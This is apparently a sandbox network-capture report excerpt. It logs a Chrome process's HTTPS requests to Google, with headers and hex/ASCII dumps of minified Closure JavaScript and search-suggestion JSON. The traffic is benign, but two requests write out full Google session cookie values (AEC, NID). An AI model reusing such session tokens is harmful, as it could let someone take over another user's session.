2024-12-12 21:40:32 UTC	3432	OUT	GET /xjs/_/js/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCEAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiSgIAABAAAAAAAAAAAAAAAAAESauLAB/d=1/ed=1/dg=3/br=1/rs=ACT90oE8aTDhxVJ6ryzMKSmV26RPmG6BpA/ee=ALeJib:B8gLwd;AfeaP:TkrAjf;BMxAGc:E5bFse;BgS6mb:fidj5d;BjwMce:cXX2Wb;CxXAWb:YyRLvc;DULqB:RKfG5c;Dkk6ge:JZmW9e;DpcR3d:zL72xf;EABSZ:MXZt9d;ESrPQc:mNTJvc;EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;EnlcNd:WeHg4;F9mqte:UoRcbe;Fmv9Nc:O1Tzwc;G0KhTb:LIaoZ;G6wU6e:hezEbd;GleZL:J1A7Od;HMDDWe:G8QUdb;HoYVKb:PkDN7e;HqeXPd:cmbnH;IBADCc:RYquRb;IoGlCf:b5lhvb;IsdWVc:qzxzOb;JXJSm:ii1RGf;JXS8fb:Qj0suc;JbMT3:M25sS;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;KOxcK:OZqGte;KQzWid:ZMKkN;KcokUb:KiuZBf;KpRAue:Tia57b;LBgRLc:SdcwHb,XVMNvd;LEikZe:byfTOb,lsjVmc;LXA8b:q7OdKd;LsNahb:ucGLNb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Np8Qkd:Dpx6qc;Nyt6ic:jn2sGd;OgagBe:cNTe0;OohIYe:mpEAQb;Pjplu [TRUNCATED] Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ; OGPC=19037049-1:
2024-12-12 21:40:33 UTC	828	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 1151965 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 12 Dec 2024 21:40:20 GMT Expires: Fri, 12 Dec 2025 21:40:20 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Thu, 12 Dec 2024 19:52:52 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding, Origin Age: 13 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 21:40:33 UTC	562	IN	Data Raw: 74 68 69 73 2e 5f 68 64 3d 74 68 69 73 2e 5f 68 64 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 47 6f 6f 67 6c 65 20 4c 4c 43 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 34 20 47 6f 6f 67 6c 65 2c 20 49 6e 63 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 Data Ascii: this._hd=this._hd\|\|{};(function(_){var window=this;try{/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0// Copyright Google LLC SPDX-License-Identifier: Apache-2.0// Copyright 2024 Google, Inc SPDX-License-Id
2024-12-12 21:40:33 UTC	1390	IN	Data Raw: 63 61 2c 68 63 61 2c 6c 63 61 2c 6e 63 61 2c 79 63 61 2c 7a 63 61 2c 41 63 61 2c 42 63 61 2c 43 63 61 2c 76 63 61 2c 44 63 61 2c 73 63 61 2c 45 63 61 2c 72 63 61 2c 74 63 61 2c 75 63 61 2c 46 63 61 2c 47 63 61 2c 48 63 61 2c 4a 63 61 2c 53 63 61 2c 54 63 61 2c 58 63 61 2c 59 63 61 2c 62 64 61 2c 65 64 61 2c 5a 63 61 2c 64 64 61 2c 63 64 61 2c 61 64 61 2c 24 63 61 2c 66 64 61 2c 67 64 61 2c 68 64 61 2c 6a 64 61 2c 6f 64 61 2c 70 64 61 2c 78 64 61 2c 79 64 61 2c 7a 64 61 2c 41 64 61 2c 42 64 61 2c 43 64 61 2c 71 64 61 2c 44 64 61 2c 47 64 61 2c 49 64 61 2c 48 64 61 2c 4b 64 61 2c 4d 64 61 2c 4c 64 61 2c 4f 64 61 2c 4e 64 61 2c 52 64 61 2c 51 64 61 2c 53 64 61 2c 57 64 61 2c 58 64 61 2c 24 64 61 2c 62 65 61 2c 65 65 61 2c 66 65 61 2c 69 65 61 2c 7a 62 2c 6f Data Ascii: ca,hca,lca,nca,yca,zca,Aca,Bca,Cca,vca,Dca,sca,Eca,rca,tca,uca,Fca,Gca,Hca,Jca,Sca,Tca,Xca,Yca,bda,eda,Zca,dda,cda,ada,$ca,fda,gda,hda,jda,oda,pda,xda,yda,zda,Ada,Bda,Cda,qda,Dda,Gda,Ida,Hda,Kda,Mda,Lda,Oda,Nda,Rda,Qda,Sda,Wda,Xda,$da,bea,eea,fea,iea,zb,o
2024-12-12 21:40:33 UTC	1390	IN	Data Raw: 2c 6b 76 61 2c 6c 76 61 2c 6d 76 61 2c 6e 76 61 2c 77 76 61 2c 76 76 61 2c 44 76 61 2c 46 76 61 2c 45 76 61 2c 47 76 61 2c 4f 76 61 2c 50 76 61 2c 53 76 61 2c 4d 76 61 2c 56 76 61 2c 57 76 61 2c 66 77 61 2c 6d 77 61 2c 6e 77 61 2c 6f 77 61 2c 73 77 61 2c 72 77 61 2c 75 77 61 2c 74 77 61 2c 76 77 61 2c 78 77 61 2c 41 77 61 2c 44 77 61 2c 45 77 61 2c 48 77 61 2c 49 77 61 2c 4a 77 61 2c 4d 77 61 2c 4b 77 61 2c 57 77 61 2c 56 77 61 2c 58 77 61 2c 61 78 61 2c 6c 78 61 2c 6d 78 61 2c 6e 78 61 2c 6f 78 61 2c 70 78 61 2c 71 78 61 2c 72 78 61 2c 73 78 61 2c 7a 78 61 2c 42 78 61 2c 43 78 61 2c 44 78 61 2c 45 78 61 2c 46 78 61 2c 47 78 61 2c 48 78 61 2c 4d 78 61 2c 50 78 61 2c 53 78 61 2c 55 78 61 2c 57 78 61 2c 24 78 61 2c 61 79 61 2c 62 79 61 2c 63 79 61 2c 66 79 Data Ascii: ,kva,lva,mva,nva,wva,vva,Dva,Fva,Eva,Gva,Ova,Pva,Sva,Mva,Vva,Wva,fwa,mwa,nwa,owa,swa,rwa,uwa,twa,vwa,xwa,Awa,Dwa,Ewa,Hwa,Iwa,Jwa,Mwa,Kwa,Wwa,Vwa,Xwa,axa,lxa,mxa,nxa,oxa,pxa,qxa,rxa,sxa,zxa,Bxa,Cxa,Dxa,Exa,Fxa,Gxa,Hxa,Mxa,Pxa,Sxa,Uxa,Wxa,$xa,aya,bya,cya,fy
2024-12-12 21:40:33 UTC	1390	IN	Data Raw: 32 7c 32 32 34 3b 64 5b 63 2b 2b 5d 3d 66 3e 3e 36 26 36 33 7c 31 32 38 7d 64 5b 63 2b 2b 5d 3d 66 26 36 33 7c 31 32 38 7d 7d 61 3d 63 3d 3d 3d 64 2e 6c 65 6e 67 74 68 3f 64 3a 64 2e 73 75 62 61 72 72 61 79 28 30 2c 63 29 7d 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 64 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 63 61 2e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 61 3b 7d 2c 30 29 7d 3b 5f 2e 65 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 5f 2e 63 61 2e 6e 61 76 69 67 61 74 6f 72 3b 72 65 74 75 72 6e 20 61 26 26 28 61 3d 61 2e 75 73 65 72 41 67 65 6e 74 29 3f 61 3a 22 22 7d 3b 69 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 5f 2e 68 61 61 3f 5f 2e 66 61 3f 5f 2e 66 61 2e 62 72 61 6e Data Ascii: 2\|224;d[c++]=f>>6&63\|128}d[c++]=f&63\|128}}a=c===d.length?d:d.subarray(0,c)}return a};_.da=function(a){_.ca.setTimeout(function(){throw a;},0)};_.ea=function(){var a=_.ca.navigator;return a&&(a=a.userAgent)?a:""};iaa=function(a){return _.haa?_.fa?_.fa.bran
2024-12-12 21:40:33 UTC	1390	IN	Data Raw: 20 62 5b 63 2e 66 69 6e 64 28 66 75 6e 63 74 69 6f 6e 28 64 29 7b 72 65 74 75 72 6e 20 64 20 69 6e 20 62 7d 29 5d 7c 7c 22 22 7d 7d 3b 5f 2e 74 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 2f 72 76 3a 20 2a 28 5b 5c 64 5c 2e 5d 2a 29 2f 2e 65 78 65 63 28 61 29 3b 69 66 28 62 26 26 62 5b 31 5d 29 72 65 74 75 72 6e 20 62 5b 31 5d 3b 62 3d 22 22 3b 76 61 72 20 63 3d 2f 4d 53 49 45 20 2b 28 5b 5c 64 5c 2e 5d 2b 29 2f 2e 65 78 65 63 28 61 29 3b 69 66 28 63 26 26 63 5b 31 5d 29 69 66 28 61 3d 2f 54 72 69 64 65 6e 74 5c 2f 28 5c 64 2e 5c 64 29 2f 2e 65 78 65 63 28 61 29 2c 63 5b 31 5d 3d 3d 22 37 2e 30 22 29 69 66 28 61 26 26 61 5b 31 5d 29 73 77 69 74 63 68 28 61 5b 31 5d 29 7b 63 61 73 65 20 22 34 2e 30 22 3a 62 3d 22 38 2e 30 22 3b 62 72 65 Data Ascii: b[c.find(function(d){return d in b})]\|\|""}};_.taa=function(a){var b=/rv: ([\d\.])/.exec(a);if(b&&b[1])return b[1];b="";var c=/MSIE +([\d\.]+)/.exec(a);if(c&&c[1])if(a=/Trident\/(\d.\d)/.exec(a),c[1]=="7.0")if(a&&a[1])switch(a[1]){case "4.0":b="8.0";bre
2024-12-12 21:40:33 UTC	1390	IN	Data Raw: 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 61 61 28 29 3f 5f 2e 66 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 22 6d 61 63 4f 53 22 3a 5f 2e 6a 61 28 22 4d 61 63 69 6e 74 6f 73 68 22 29 7d 3b 5f 2e 7a 61 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 61 61 28 29 3f 5f 2e 66 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 22 4c 69 6e 75 78 22 3a 5f 2e 6a 61 28 22 4c 69 6e 75 78 22 29 7d 3b 5f 2e 41 61 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 61 61 28 29 3f 5f 2e 66 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 22 57 69 6e 64 6f 77 73 22 3a 5f 2e 6a 61 28 22 57 69 6e 64 6f 77 73 22 29 7d 3b 42 61 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 61 61 28 29 3f 5f 2e 66 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 22 43 68 72 6f Data Ascii: ction(){return waa()?_.fa.platform==="macOS":_.ja("Macintosh")};_.zaa=function(){return waa()?_.fa.platform==="Linux":_.ja("Linux")};_.Aaa=function(){return waa()?_.fa.platform==="Windows":_.ja("Windows")};Baa=function(){return waa()?_.fa.platform==="Chro
2024-12-12 21:40:33 UTC	1390	IN	Data Raw: 61 29 29 72 65 74 75 72 6e 20 65 3b 72 65 74 75 72 6e 2d 31 7d 3b 5f 2e 44 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 43 61 28 61 2c 62 29 3e 3d 30 7d 3b 5f 2e 45 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 44 61 28 61 2c 62 29 7c 7c 61 2e 70 75 73 68 28 62 29 7d 3b 5f 2e 47 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 5f 2e 43 61 28 61 2c 62 29 3b 76 61 72 20 63 3b 28 63 3d 62 3e 3d 30 29 26 26 5f 2e 46 61 28 61 2c 62 29 3b 72 65 74 75 72 6e 20 63 7d 3b 5f 2e 46 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 70 6c 69 63 65 2e 63 61 6c 6c 28 61 2c 62 2c 31 29 2e 6c 65 6e 67 74 68 3d 3d 31 7d 3b 0a 5f 2e 48 61 61 3d 66 75 6e 63 74 69 Data Ascii: a))return e;return-1};_.Da=function(a,b){return _.Ca(a,b)>=0};_.Ea=function(a,b){_.Da(a,b)\|\|a.push(b)};_.Ga=function(a,b){b=_.Ca(a,b);var c;(c=b>=0)&&_.Fa(a,b);return c};_.Fa=function(a,b){return Array.prototype.splice.call(a,b,1).length==1};_.Haa=functi
2024-12-12 21:40:33 UTC	1390	IN	Data Raw: 5f 2e 4e 61 61 29 7d 3b 5f 2e 50 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 5f 2e 49 61 28 61 29 7c 7c 21 5f 2e 49 61 28 62 29 7c 7c 61 2e 6c 65 6e 67 74 68 21 3d 62 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 64 3d 61 2e 6c 65 6e 67 74 68 3b 63 3d 63 7c 7c 50 61 61 3b 66 6f 72 28 76 61 72 20 65 3d 30 3b 65 3c 64 3b 65 2b 2b 29 69 66 28 21 63 28 61 5b 65 5d 2c 62 5b 65 5d 29 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 3b 5f 2e 4e 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3e 62 3f 31 3a 61 3c 62 3f 2d 31 3a 30 7d 3b 50 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d 62 7d 3b 0a 5f 2e 51 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 Data Ascii: _.Naa)};_.Pa=function(a,b,c){if(!_.Ia(a)\|\|!_.Ia(b)\|\|a.length!=b.length)return!1;var d=a.length;c=c\|\|Paa;for(var e=0;e<d;e++)if(!c(a[e],b[e]))return!1;return!0};_.Naa=function(a,b){return a>b?1:a<b?-1:0};Paa=function(a,b){return a===b};_.Qaa=function(a,b)
2024-12-12 21:40:33 UTC	1390	IN	Data Raw: 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 62 61 26 26 61 21 3d 6e 75 6c 6c 26 26 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 7d 3b 0a 63 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 61 2e 6c 65 6e 67 74 68 3b 69 66 28 63 21 3d 3d 62 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 21 31 3b 66 6f 72 28 76 61 72 20 64 3d 30 3b 64 3c 63 3b 64 2b 2b 29 69 66 28 61 5b 64 5d 21 3d 3d 62 5b 64 5d 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 3b 5f 2e 65 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 6c 65 6e 67 74 68 3d 3d 30 3f 5f 2e 56 61 28 29 3a 6e 65 77 20 5f 2e 57 61 28 61 2c 5f 2e 64 62 61 29 7d 3b 0a 67 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 74 79 70 65 6f 66 20 Data Ascii: on(a){return aba&&a!=null&&a instanceof Uint8Array};cba=function(a,b){var c=a.length;if(c!==b.length)return!1;for(var d=0;d<c;d++)if(a[d]!==b[d])return!1;return!0};_.eba=function(a){return a.length==0?_.Va():new _.Wa(a,_.dba)};gba=function(a){if(typeof
2024-12-12 21:40:33 UTC	1390	IN	Data Raw: 69 73 53 61 66 65 49 6e 74 65 67 65 72 28 62 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 53 74 72 69 6e 67 28 62 29 29 3b 72 65 74 75 72 6e 20 75 62 61 3f 42 69 67 49 6e 74 28 61 29 3a 61 3d 76 62 61 28 61 29 3f 61 3f 22 31 22 3a 22 30 22 3a 28 30 2c 5f 2e 73 62 61 29 28 61 29 3f 61 2e 74 72 69 6d 28 29 7c 7c 22 30 22 3a 53 74 72 69 6e 67 28 61 29 7d 3b 77 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 2e 6c 65 6e 67 74 68 3e 62 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 21 31 3b 69 66 28 61 2e 6c 65 6e 67 74 68 3c 62 2e 6c 65 6e 67 74 68 7c 7c 61 3d 3d 3d 62 29 72 65 74 75 72 6e 21 30 3b 66 6f 72 28 76 61 72 20 63 3d 30 3b 63 3c 61 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 7b 76 61 72 20 64 3d 61 5b 63 5d 2c 65 3d 62 5b 63 5d 3b 69 66 28 64 3e 65 Data Ascii: isSafeInteger(b))throw Error(String(b));return uba?BigInt(a):a=vba(a)?a?"1":"0":(0,_.sba)(a)?a.trim()\|\|"0":String(a)};wba=function(a,b){if(a.length>b.length)return!1;if(a.length<b.length\|\|a===b)return!0;for(var c=0;c<a.length;c++){var d=a[c],e=b[c];if(d>e

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49786	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:32 UTC	864	OUT	GET /complete/search?q&cp=0&client=gws-wiz&xssi=t&gs_pcrt=2&hl=en&authuser=0&psi=QVhbZ6XKF6u3i-gP-ZzZoAs.1734039622974&dpr=1&nolsbt=1 HTTP/1.1 Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; NID=520=aSGifw0dBOHDKuxR1WxzRJbm2njxjSbKTqS_1eYCH2LEvb-5mXpwhlp0Xf0kgRP1twFQ6PZptMF6D-9RonR-UUIKkJr-6V9yCQ3MK5pdU48a2F31MNo27LqLY9SX3OH6rhFLFubbo0ermIU_jsrF7Ep69lqciDtXl_0penBwgQ33ck1XHW_pX_-4tg8G2MR0Ib_9KImZ; OGPC=19037049-1:
2024-12-12 21:40:33 UTC	1305	IN	HTTP/1.1 200 OK X-Content-Type-Options: nosniff Date: Thu, 12 Dec 2024 21:40:33 GMT Expires: Thu, 12 Dec 2024 21:40:33 GMT Cache-Control: private, max-age=3600 Content-Type: application/json; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-NSpg0WtQ6hRAgtlR5oOx4Q' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-12 21:40:33 UTC	85	IN	Data Raw: 39 61 33 0d 0a 29 5d 7d 27 0a 5b 5b 5b 22 6e 79 74 20 73 74 72 61 6e 64 73 20 68 69 6e 74 73 20 64 65 63 65 6d 62 65 72 20 31 32 22 2c 30 2c 5b 33 2c 33 36 32 2c 31 34 33 5d 2c 7b 22 7a 66 22 3a 33 33 2c 22 7a 6c 22 3a 38 2c 22 7a 70 22 3a 7b 22 67 73 5f Data Ascii: 9a3)]}'[[["nyt strands hints december 12",0,[3,362,143],{"zf":33,"zl":8,"zp":{"gs_
2024-12-12 21:40:33 UTC	1390	IN	Data Raw: 73 73 22 3a 22 31 22 7d 7d 5d 2c 5b 22 61 6c 65 78 61 6e 64 65 72 20 73 6d 69 72 6e 6f 76 22 2c 34 36 2c 5b 33 2c 33 36 32 2c 31 34 33 5d 2c 7b 22 6c 6d 22 3a 5b 5d 2c 22 7a 66 22 3a 33 33 2c 22 7a 68 22 3a 22 41 6c 65 78 61 6e 64 65 72 20 53 6d 69 72 6e 6f 76 22 2c 22 7a 69 22 3a 22 22 2c 22 7a 6c 22 3a 38 2c 22 7a 70 22 3a 7b 22 67 73 5f 73 73 70 22 3a 22 65 4a 7a 6a 34 74 56 50 31 7a 63 30 4c 44 65 78 7a 43 6f 72 4b 7a 63 32 59 50 51 53 54 4d 78 4a 72 55 6a 4d 53 30 6b 74 55 69 6a 4f 7a 53 7a 4b 79 79 38 44 41 4c 6e 62 43 35 45 22 7d 2c 22 7a 73 22 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 6a 70 65 67 3b 62 61 73 65 36 34 2c 2f 39 6a 2f 34 41 41 51 53 6b 5a 4a 52 67 41 42 41 51 41 41 41 51 41 42 41 41 44 2f 32 77 43 45 41 41 6b 47 42 77 67 48 42 67 6b 49 Data Ascii: ss":"1"}}],["alexander smirnov",46,[3,362,143],{"lm":[],"zf":33,"zh":"Alexander Smirnov","zi":"","zl":8,"zp":{"gs_ssp":"eJzj4tVP1zc0LDexzCorKzc2YPQSTMxJrUjMS0ktUijOzSzKyy8DALnbC5E"},"zs":"data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAkGBwgHBgkI
2024-12-12 21:40:33 UTC	999	IN	Data Raw: 67 45 6d 31 77 79 39 33 6c 35 58 4a 38 7a 68 76 39 48 66 46 6b 44 35 43 32 52 79 52 75 4b 61 67 6e 65 61 6e 71 62 57 31 52 74 4a 65 7a 69 2f 72 58 59 38 74 72 65 79 35 66 64 5a 50 38 4e 4d 70 2f 37 46 44 2b 34 76 34 59 55 65 49 4f 48 38 33 7a 57 47 72 71 4d 73 76 49 6b 64 51 55 65 48 58 59 73 76 4d 32 2b 50 4c 72 66 48 64 58 78 44 4f 73 51 6a 70 2b 37 48 48 5a 57 50 55 2b 2f 70 67 2f 77 44 6d 4c 56 36 35 6a 54 79 4f 62 33 57 51 45 48 78 47 6b 37 2f 77 6a 34 34 53 55 64 48 6a 4c 6a 34 5a 69 75 57 7a 35 6c 6d 4c 69 71 70 33 70 4b 47 43 51 53 56 4d 78 56 6b 37 4e 46 39 59 47 34 32 32 48 54 6c 7a 78 72 79 71 43 6f 62 59 72 62 75 32 35 65 37 47 65 2b 6a 67 5a 62 55 63 61 38 55 55 69 55 71 77 73 37 4f 59 51 72 66 71 6b 6b 5a 57 42 48 38 53 6e 33 2b 57 41 55 64 Data Ascii: gEm1wy93l5XJ8zhv9HfFkD5C2RyRuKagneanqbW1RtJezi/rXY8trey5fdZP8NMp/7FD+4v4YUeIOH83zWGrqMsvIkdQUeHXYsvM2+PLrfHdXxDOsQjp+7HHZWPU+/pg/wDmLV65jTyOb3WQEHxGk7/wj44SUdHjLj4ZiuWz5lmLiqp3pKGCQSVMxVk7NF9YG422HTlzxryqCobYrbu25e7Ge+jgZbUca8UUiUqws7OYQrfqkkZWBH8Sn3+WAUd
2024-12-12 21:40:33 UTC	88	IN	Data Raw: 35 32 0d 0a 56 55 2f 38 63 4c 64 4d 7a 33 6b 56 57 59 49 7a 43 36 67 37 48 6d 51 50 6c 68 33 7a 62 4a 63 74 6b 79 35 6a 6c 6b 4a 4e 63 39 72 4d 73 68 4b 6a 63 58 4a 75 54 35 34 70 35 54 77 39 45 32 52 72 4a 56 51 68 36 6e 37 78 37 4a 31 75 64 6b 4d 4c 4d 76 0d 0a Data Ascii: 52VU/8cLdMz3kVWYIzC6g7HmQPlh3zbJctky5jlkJNc9rMshKjcXJuT54p5Tw9E2RrJVQh6n7x7J1udkMLMv
2024-12-12 21:40:33 UTC	1390	IN	Data Raw: 64 33 33 0d 0a 4c 7a 56 76 68 67 55 2f 4e 34 68 72 75 6c 6f 76 4b 32 35 4e 72 71 4c 6b 33 36 64 4d 4e 73 68 4d 58 44 39 41 69 71 51 6f 67 56 7a 63 6b 62 74 33 76 4c 78 77 73 35 31 54 66 64 39 56 4c 44 47 7a 42 4e 50 49 37 6b 65 56 7a 68 70 7a 35 65 7a 70 30 6a 41 32 53 4d 4b 76 73 41 36 59 36 4f 4c 69 32 6d 52 54 31 61 69 6c 6b 45 68 65 6b 64 64 56 77 48 62 32 63 38 46 71 4a 58 69 72 49 4b 70 4e 6d 6a 6d 56 68 35 32 59 47 33 79 77 4b 34 5a 54 54 54 41 39 47 75 62 34 4f 78 77 78 54 50 48 48 4f 41 79 46 31 76 71 39 76 50 36 34 50 30 59 6d 7a 6d 70 74 36 56 78 55 49 54 2f 65 64 4e 76 35 58 6a 42 2b 75 49 2f 53 66 66 38 73 4b 6f 2f 6f 6c 45 59 65 38 57 2b 6d 42 4f 62 31 44 48 30 67 76 4b 70 35 5a 68 43 77 39 78 53 32 4c 66 70 44 71 6a 55 38 55 54 6d 34 75 69 Data Ascii: d33LzVvhgU/N4hrulovK25NrqLk36dMNshMXD9AiqQogVzckbt3vLxws51Tfd9VLDGzBNPI7keVzhpz5ezp0jA2SMKvsA6Y6OLi2mRT1ailkEhekddVwHb2c8FqJXirIKpNmjmVh52YG3ywK4ZTTTA9Gub4OxwxTPHHOAyF1vq9vP64P0Ymzmpt6VxUIT/edNv5XjB+uI/Sff8sKo/olEYe8W+mBOb1DH0gvKp5ZhCw9xS2LfpDqjU8UTm4ui
